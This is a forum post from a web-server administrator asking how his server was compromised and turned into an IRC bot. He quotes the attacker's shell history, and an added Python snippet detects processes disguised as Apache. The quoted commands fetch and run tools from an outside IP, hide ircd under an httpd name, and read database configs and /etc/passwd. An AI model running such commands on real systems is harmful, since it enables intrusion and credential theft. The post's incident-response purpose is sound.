Full Discussion: Server has been compromised
Special Forums Cybersecurity Server has been compromised Post 302756717 by franx47 on Wednesday 16th of January 2013 11:50:08 AM
Need deep technical explanations

@Corona.
If it means a full backup of each domain in /home, no, I didn't make any backup. Disk space is limited and there is no additional disk. As a last option maybe I should request an OS restore from the hosting provider(?).

I was doing a deep analysis of this attack for several days, and I guess my server has been turned into one of the botnets on the internet for several months or maybe a year.

One thing that makes me confused: I have locked the domain account that might have been compromised. After doing the procedures above, how can the attacker create multiple processes and open ports 6667, 7000 with that locked account name and establish a connection to xxx.IRC.dal.net?

@Neo.
Thanks for your suggestion. I'll learn about that tripwire technique.

But, do you have any idea about how the attacker compromised my server?


# Additional information.

Here I give part of the command history left by the attacker in the last days.

Code:
pwd
history
cd /data/PEAR
ls -al
rm -rf bahamut-1.8.9
wget http://193.180.115.30/~online/tools/bahamut-1.8.9-release.tar.gz ; 
tar -zxvf bahamut-1.8.9-release.tar.gz ; 
rm -f bahamut-1.8.9-release.$
ls -al //ircd/template.conf
mkdir ircd
pwd
cd ..
mkdir ircd
cd ircd
cp /ircd/* .
ls -al
ls -al /ircd
rm -rf /ircd
ls -al
exit
cd /data/PEAR/ircd
save
hostname ; /sbin/ifconfig | grep inet
pwd
pico ircd.conf
ls -al
wget http://193.180.115.30/~online/tools/xh ; chmod +x xh ; ls -alF xh
ps aux
./xh -s "/usr/local/apache/bin/httpd -k start -DSSL" ./ircd
cd ..
pwd
id
exit

And here is another part of the command history.

Code:
cd $home
ls -al
cd public_html
ls -al
cat config.php
cat dbcon.php
cat /etc/passwd
wget http://193.180.115.30/~online/ftp ; ls -alF ftp*
perl ftp
rm -f ftp ftp.txt
exit

I think the attacker seems to be a pro in Linux.
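As an added example (not from the thread or from franx47), a Python check for the trick visible in the history above: xh relaunches ircd with an Apache-looking command line, but /proc/<pid>/exe still names the real binary, and a connection to 6667 or 7000 is a second signal. The sample processes are constructed to mirror the post; run from_live_proc() on a real Linux host instead.

```python
import os
from dataclasses import dataclass, field
# Locking an account only rejects new logins; processes already running
# keep their uid, so hunt them by what they really execute, not by name.
IRC_PORTS = {6667, 7000}  # remote ports the poster saw the locked account open

@dataclass
class Proc:
    pid: int
    cmdline: str  # argv as ps shows it; argv[0] can be spoofed
    exe: str      # target of /proc/<pid>/exe, resolved by the kernel
    remote_ports: frozenset = field(default_factory=frozenset)

def is_masquerading(p: Proc) -> bool:
    """argv[0] claims one program but the kernel says another is running.
    ' (deleted)' means the binary was unlinked after launch. Interpreter
    symlinks (sh -> dash) give benign mismatches; allow-list them."""
    if not p.cmdline or not p.exe:
        return False
    if p.exe.endswith(" (deleted)"):
        return True
    return os.path.basename(p.cmdline.split()[0]) != os.path.basename(p.exe)

def suspicious_pids(procs):
    """PIDs that masquerade or talk to the IRC ports from the thread."""
    return [p.pid for p in procs
            if is_masquerading(p) or (p.remote_ports & IRC_PORTS)]

def from_live_proc():
    """Collect Proc entries from a running Linux host (root needed for other
    users' exe links). Sockets are not resolved here; pair with `ss -tnp`."""
    out = []
    for d in os.listdir("/proc"):
        if not d.isdigit():
            continue
        try:
            with open(f"/proc/{d}/cmdline", "rb") as f:
                cmd = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            out.append(Proc(int(d), cmd, os.readlink(f"/proc/{d}/exe")))
        except OSError:
            continue
    return out

# Constructed sample: real httpd, ircd launched via xh with the httpd argv, perl.
SAMPLE = [
    Proc(1201, "/usr/local/apache/bin/httpd -k start -DSSL", "/usr/local/apache/bin/httpd"),
    Proc(4410, "/usr/local/apache/bin/httpd -k start -DSSL", "/data/PEAR/ircd/ircd", frozenset({6667})),
    Proc(4411, "perl ftp", "/usr/bin/perl"),
]
```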
 

Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.